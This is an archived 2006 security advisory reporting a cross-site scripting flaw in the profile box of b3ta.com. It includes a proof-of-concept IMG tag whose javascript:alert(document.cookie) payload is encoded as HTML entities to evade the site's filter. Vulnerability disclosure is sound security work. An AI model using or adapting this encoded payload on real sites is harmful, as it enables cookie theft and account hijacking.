b3ta.txt

b3ta.txt: Posted Jun 25, 2006; Authored by Luny; B3ta.com suffers from a cross site scripting flaw.; tags | exploit, xss; SHA-256 | 1c55d83e647e318fb600f544dd32adc690cc9136d230af3e63666a475966385f; Download | Favorite | View

b3ta.txt

B3ta.com

Homepage:
http://www.b3ta.com

Affected files:
Input boxes of your profile


XSS vuln with cookie disclosure via Profile: box.

Data isn't correctly sanatized before being generated. We can bypass the filters of the site one way by using img tags and converting our javascript to UTF-8 unicode. PoC:

<IMG SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x29;>

Screenshots:

http://www.youfucktard.com/xsp/b3ta1.jpg
http://www.youfucktard.com/xsp/b3ta2.jpg

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 87 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

b3ta.txt

b3ta.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

b3ta.txt

Share This

b3ta.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems